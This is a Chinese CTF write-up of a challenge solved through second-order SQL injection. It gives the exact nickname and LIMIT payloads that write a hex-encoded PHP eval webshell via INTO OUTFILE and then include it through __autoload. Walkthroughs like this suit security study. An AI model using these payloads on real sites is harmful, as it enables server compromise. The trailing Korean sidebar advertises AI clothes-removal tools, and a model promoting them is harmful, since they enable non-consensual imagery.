三个白猫抓flag鼠系列1的writeup(详细记录一系列的坑)
首先想说这是我见过的最绕的题目了,不得不说出题人的思路太猥琐。
首先在访问http://8ed0a7d1a5ed5b5ac.jie.sangebaimao.com/sangebaomao.zip得到源码。根据tips是二次注入还要getshell。看着就带劲。
一、 先看看文件吧
其中include.php做了为全局,而且GET、POST、COOKIE 用了addslashes转义,所以基本不能通过一次注入来货的shell,除非有些入库的变量没有单引号包裹。
看看main.php有个25行
其中的limit后面的$num是来自 $_SESSION['limit'], 追溯$_SESSION['limit']最终来自的是用户注册,因为limit之后是可以执行into outfile的。这也算是一个知识点吧。所以我们能够通过注册的limit来控制写入的路径,那怎么控制写入的内容呢。很明显。我们只有从name 和 message字段下手。追溯这两个字段的来源。
name字段是由注册的时候nickname参数的先存入数据库,然后再查询出来的。 追溯到注册的代码才发现 $name 被 htmlspecialchars() 实体化了, 所以 name 是不能直接引入
后来玉林嘎大牛提醒,用 0x, 他一说0x, 我马上反应过来再找个二次注入,让 message字段 入库的时候以 16 进制写进数据库,只要是没有单引号包裹的 16 进制最后入库都会还原成原本的字符串。
解开这个结的就是main.php中的 18 行的 sql 语句。
在这个 inster 语句中, $name 是注册的时候可控的。所以我们如果注册的时候,我把 name 注册成这样 aa ’ ,0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)#
其中 16 进制是一句话的 hex 编码。这样的话 我们执行 insert into guestbook(`uid`,`name`, `message`) values('".$uid."','".$name."','".$message."') 的时候真正的数据库代码是 如下图的
# 之后的被注释, 0x3c3f70687020406576616c28245f504f53545b615d293b3f3e 就是字段 message 的值,而且是没有单引号包裹的。所以当我们执行了 insert 操作之后。m essage 字段的值就是 了 ,那么当执行 select 操作语句的时候, message 是从数据库查询出来的所以不会被实体化,因此就可以 getshell 啦。听着是不是觉得好绕啊。
二、
那么来讲是实现过程
Username password 填写正常。
nikname 填写 aa',0x3c3f70687020406576616c28245f504f53545b615d293b3f3e)#
limit 填写 10 into outfile 'd:/www/answer.php'
然后登陆,在留言板处 随便留一句。
来监控数据库看看 ,SQL 语句完美执行
来看看写入的文件,完美写入网站根目录
三、
到这里这里你觉得就 oK 了吗,然而并不是,最好玩的才刚开始。我在三个白帽的服务器上测试的时候怎么也写不进,然后去问了出题人是不是 web 目录不可写然后得到了答案不可写。
而且还提示要利用代码里面的 _autoload 函数的特性。后来去搜了搜特性,发现这是一个注册类的函数,在没有给定处理用函数数的情况下当你去实例化类的时候,就会直接包含目录下的与类名相同的 .php 文件或者是 .inc 文件。其实说简单点,就是这个函数可以包含文件。
然后我就去看了看题目的源代码,看在哪里调用了 _autoload 这个函数,这个函数是写在 include.php 中的,然后被 ini.php 包含 ,int.php 再然后被 main.phph 包含 在 main.php 中有一个类的实例化的操作
可以看到类名是 $action ,而 $action 是我们控的。看到这里,我的思路就明了啦。我们往一个可写目录写一个 php 文件,然后我们再把这个文件的完整目录和文件名传给 $action, 那么当 php 去实例化这个 $action 这个类的时候。就会自动包含我们穿上去的文件,那么我们就通过文件包含 getshell 啦。因为是 linux 的服务器,所以 /tmp 目录应该是可写的。所以真正的 palyload 出来了
nicknmae : 填成了 aa',0x3c3f70687020706870696e666f28293b3f3e)# 这是 phpinfo 的 16 进制,因为这样写的话可以很清楚的看到包含成功没有
Limit : 10 into outfile '/tmp/answer.php'
然后登陆,随便发表评论。
最后访问 xxx.com/main.php?action=/tmp/answer
成功执行代码
那么可以就可以把 phpinfo 换成一句话写进去,此处有一个坑,就是必须在登录情况下才能访问到 shell 。如果你用菜刀的话,还要想办法带着 session 。所以我就直接写成了 ,用火狐去发包 。
然后成功翻到flag
后记:只能说出题人太猥琐,而且确实太绕啦。不过确实很有趣,二次注入写shell加上利用特性,简直是极致。

핫 AI 도구

Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool
무료로 이미지를 벗다

Clothoff.io
AI 옷 제거제

Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

인기 기사

뜨거운 도구

메모장++7.3.1
사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전
중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기
강력한 PHP 통합 개발 환경

드림위버 CS6
시각적 웹 개발 도구

SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)

PHP에는 4 가지 주요 오류 유형이 있습니다. 1. NOTICE : 가장 작은 것은 정의되지 않은 변수에 액세스하는 것과 같이 프로그램을 방해하지 않습니다. 2. 경고 : 심각한 통지는 파일을 포함하지 않는 것과 같은 프로그램을 종료하지 않습니다. 3. FatalError : 가장 심각한 것은 기능을 부르는 것과 같은 프로그램을 종료합니다. 4. parseerror : 구문 오류는 엔드 태그를 추가하는 것을 잊어 버리는 것과 같이 프로그램이 실행되는 것을 방지합니다.

PHP와 Python은 각각 고유 한 장점이 있으며 프로젝트 요구 사항에 따라 선택합니다. 1.PHP는 웹 개발, 특히 웹 사이트의 빠른 개발 및 유지 보수에 적합합니다. 2. Python은 간결한 구문을 가진 데이터 과학, 기계 학습 및 인공 지능에 적합하며 초보자에게 적합합니다.

PHP에서 Password_hash 및 Password_Verify 기능을 사용하여 보안 비밀번호 해싱을 구현해야하며 MD5 또는 SHA1을 사용해서는 안됩니다. 1) Password_hash는 보안을 향상시키기 위해 소금 값이 포함 된 해시를 생성합니다. 2) Password_verify 암호를 확인하고 해시 값을 비교하여 보안을 보장합니다. 3) MD5 및 SHA1은 취약하고 소금 값이 부족하며 현대 암호 보안에는 적합하지 않습니다.

PHP는 전자 상거래, 컨텐츠 관리 시스템 및 API 개발에 널리 사용됩니다. 1) 전자 상거래 : 쇼핑 카트 기능 및 지불 처리에 사용됩니다. 2) 컨텐츠 관리 시스템 : 동적 컨텐츠 생성 및 사용자 관리에 사용됩니다. 3) API 개발 : 편안한 API 개발 및 API 보안에 사용됩니다. 성능 최적화 및 모범 사례를 통해 PHP 애플리케이션의 효율성과 유지 보수 성이 향상됩니다.

HTTP 요청 방법에는 각각 리소스를 확보, 제출, 업데이트 및 삭제하는 데 사용되는 Get, Post, Put and Delete가 포함됩니다. 1. GET 방법은 리소스를 얻는 데 사용되며 읽기 작업에 적합합니다. 2. 게시물은 데이터를 제출하는 데 사용되며 종종 새로운 리소스를 만드는 데 사용됩니다. 3. PUT 방법은 리소스를 업데이트하는 데 사용되며 완전한 업데이트에 적합합니다. 4. 삭제 방법은 자원을 삭제하는 데 사용되며 삭제 작업에 적합합니다.

PHP는 서버 측에서 널리 사용되는 스크립팅 언어이며 특히 웹 개발에 적합합니다. 1.PHP는 HTML을 포함하고 HTTP 요청 및 응답을 처리 할 수 있으며 다양한 데이터베이스를 지원할 수 있습니다. 2.PHP는 강력한 커뮤니티 지원 및 오픈 소스 리소스를 통해 동적 웹 컨텐츠, 프로세스 양식 데이터, 액세스 데이터베이스 등을 생성하는 데 사용됩니다. 3. PHP는 해석 된 언어이며, 실행 프로세스에는 어휘 분석, 문법 분석, 편집 및 실행이 포함됩니다. 4. PHP는 사용자 등록 시스템과 같은 고급 응용 프로그램을 위해 MySQL과 결합 할 수 있습니다. 5. PHP를 디버깅 할 때 error_reporting () 및 var_dump ()와 같은 함수를 사용할 수 있습니다. 6. 캐싱 메커니즘을 사용하여 PHP 코드를 최적화하고 데이터베이스 쿼리를 최적화하며 내장 기능을 사용하십시오. 7

PHP는 $ \ _ 파일 변수를 통해 파일 업로드를 처리합니다. 보안을 보장하는 방법에는 다음이 포함됩니다. 1. 오류 확인 확인, 2. 파일 유형 및 크기 확인, 3 파일 덮어 쓰기 방지, 4. 파일을 영구 저장소 위치로 이동하십시오.

phpoop에서 self ::는 현재 클래스를 말하며, Parent ::는 부모 클래스를 말하며, static ::는 늦은 static 바인딩에 사용됩니다. 1. self :: 정적 방법과 일정한 호출에 사용되지만 늦은 정적 바인딩을 지원하지는 않습니다. 2.parent :: 하위 클래스가 상위 클래스 방법을 호출하는 데 사용되며 개인 방법에 액세스 할 수 없습니다. 3. Static ::는 상속 및 다형성에 적합한 후기 정적 결합을 지원하지만 코드의 가독성에 영향을 줄 수 있습니다.
